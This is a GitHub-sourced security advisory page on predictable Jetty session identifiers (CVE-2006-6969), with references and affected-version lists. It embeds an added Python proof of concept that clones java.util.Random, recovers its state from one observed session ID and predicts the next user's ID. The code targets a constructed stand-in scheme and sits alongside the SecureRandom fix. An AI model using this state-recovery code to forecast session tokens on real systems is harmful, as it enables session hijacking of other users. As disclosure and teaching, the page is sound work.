Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1qZzJ4LXI2NDMtdzJjaM2Uig
Jetty Uses Predictable Session Identifiers
Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.Random (a non-cryptographic linear congruential generator), which makes it easier for remote attackers to guess a valid session identifier by brute force, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.
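Why a java.util.Random-derived identifier is guessable rather than merely "weak": the class is a 48-bit linear congruential generator whose nextInt() returns the top 32 bits of its state, so two consecutive outputs leave only 2^16 candidates for the hidden bits. The following is an added example, not Jetty code and not taken from the advisory or its references: JavaRandom is a bit-exact Python port of java.util.Random, make_session_id is a constructed stand-in for a server that derives an ID from two nextInt() calls (Jetty's actual construction is not reproduced here), and predict_next_session_id is the attacker recovering the state from one observed ID and forecasting the next one. make_secure_session_id shows the corrected approach, a CSPRNG (java.security.SecureRandom in Java, the secrets module in Python).

```python
"""Why java.util.Random must not generate session IDs (added example).

JavaRandom is a bit-exact Python port of java.util.Random's 48-bit linear
congruential generator. make_session_id is a constructed stand-in for a
server that derives IDs from it (it is not Jetty's code and does not claim
to reproduce Jetty's exact construction). predict_next_session_id is the
attacker: from one observed ID it recovers the generator state and emits
the ID the server will issue next.
"""
from typing import Optional
import secrets

MULT = 0x5DEECE66D          # java.util.Random multiplier
ADD = 0xB                   # java.util.Random addend
MASK = (1 << 48) - 1        # 48 bits of state


def _to_signed32(x: int) -> int:
    """Mimic Java's (int) cast applied to the value next(32) returns."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x


class JavaRandom:
    """Bit-exact port of java.util.Random: next(bits) leaks the top `bits` of state."""

    def __init__(self, seed: int):
        # Random(long seed): this.seed = (seed ^ 0x5DEECE66DL) & ((1L << 48) - 1)
        self.seed = (seed ^ MULT) & MASK

    @classmethod
    def from_state(cls, state: int) -> "JavaRandom":
        """Clone a generator from recovered raw state (skips seed scrambling)."""
        rng = cls.__new__(cls)
        rng.seed = state & MASK
        return rng

    def _next(self, bits: int) -> int:
        self.seed = (self.seed * MULT + ADD) & MASK
        return _to_signed32(self.seed >> (48 - bits))

    def next_int(self) -> int:
        """java.util.Random.nextInt(): 32 of the 48 state bits, in the clear."""
        return self._next(32)


def make_session_id(rng: JavaRandom) -> str:
    """Constructed vulnerable scheme: two nextInt() outputs, hex-encoded."""
    hi = rng.next_int() & 0xFFFFFFFF
    lo = rng.next_int() & 0xFFFFFFFF
    return f"{hi:08x}{lo:08x}"


def make_secure_session_id() -> str:
    """The fix: a CSPRNG (java.security.SecureRandom in Java, `secrets` here)."""
    return secrets.token_hex(16)


def recover_state(out1: int, out2: int) -> Optional[int]:
    """Recover the LCG state from two consecutive nextInt() values.

    nextInt() exposes the top 32 of 48 state bits, so only 2**16 candidates
    remain for the hidden low bits; the second output confirms the right one.
    Returns the state *after* out2 was produced (first candidate that fits;
    a false positive has probability about 2**-16).
    """
    u1 = out1 & 0xFFFFFFFF
    u2 = out2 & 0xFFFFFFFF
    for low in range(1 << 16):
        candidate = (u1 << 16) | low
        nxt = (candidate * MULT + ADD) & MASK
        if (nxt >> 16) == u2:
            return nxt
    return None


def predict_next_session_id(observed_id: str) -> Optional[str]:
    """Attacker view: one leaked ID is enough to forecast the next one."""
    hi = int(observed_id[:8], 16)
    lo = int(observed_id[8:], 16)
    state = recover_state(hi, lo)
    if state is None:
        return None
    return make_session_id(JavaRandom.from_state(state))


if __name__ == "__main__":
    server = JavaRandom(seed=20070205)   # constructed seed; a clock-derived one is no better
    mine = make_session_id(server)       # attacker's own, legitimately issued session
    victim = make_session_id(server)     # the next user to log in
    print("observed ", mine)
    print("predicted", predict_next_session_id(mine))
    print("victim   ", victim)
```

The brute force runs in well under a second in pure Python, which is the practical content of the advisory: once an attacker holds one of their own session cookies, guessing a neighbour's is a 65,536-step search, not a 2^64 one. Seeding from the clock does not help, since the attack never needs the seed, only two consecutive outputs.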
Permalink: https://github.com/advisories/GHSA-jg2x-r643-w2ch
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZzJ4LXI2NDMtdzJjaM2Uig
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 2 years ago
Updated: 3 months ago
Identifiers: GHSA-jg2x-r643-w2ch, CVE-2006-6969
References:
- https://nvd.nist.gov/vuln/detail/CVE-2006-6969
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32240
- https://github.com/jetty-project/codehaus-jetty6/commit/36f81d2e7058b012f6718bc2f1e2786694a8a4a1
- https://github.com/jetty-project/codehaus-jetty6/commit/b31f606bf8058a38ab6253aa8dc2dfe6a7f83c78
- https://web.archive.org/web/20070208112816/http://fisheye.codehaus.org/changelog/jetty/?cs=1274
- https://web.archive.org/web/20070602184857/http://archives.neohapsis.com/archives/bugtraq/2007-02/0070.html
- https://web.archive.org/web/20121019131825/http://www.securityfocus.com/archive/1/459164/100/0/threaded
- https://web.archive.org/web/20200228100052/http://www.securityfocus.com/bid/22405
- https://github.com/advisories/GHSA-jg2x-r643-w2ch
Blast Radius: 0.0
Affected Packages
maven:org.eclipse.jetty:jetty-server
Dependent packages: 3,819
Dependent repositories: 34,580
Downloads:
Affected Version Ranges: >= 6.1.0pre1, < 6.1.0pre3, >= 6.0.0, < 6.0.2, >= 5.1.0, < 5.1.12, < 4.2.27
Fixed in: 6.1.0pre3, 6.0.2, 5.1.12, 4.2.27
All affected versions:
All unaffected versions: 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 10.0.8, 10.0.9, 10.0.10, 10.0.11, 10.0.12, 10.0.13, 10.0.14, 10.0.15, 10.0.16, 10.0.17, 10.0.18, 10.0.19, 10.0.20, 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4, 11.0.5, 11.0.6, 11.0.7, 11.0.8, 11.0.9, 11.0.10, 11.0.11, 11.0.12, 11.0.13, 11.0.14, 11.0.15, 11.0.16, 11.0.17, 11.0.18, 11.0.19, 11.0.20, 12.0.0, 12.0.1, 12.0.2, 12.0.3, 12.0.4, 12.0.5, 12.0.6, 12.0.7, 12.0.8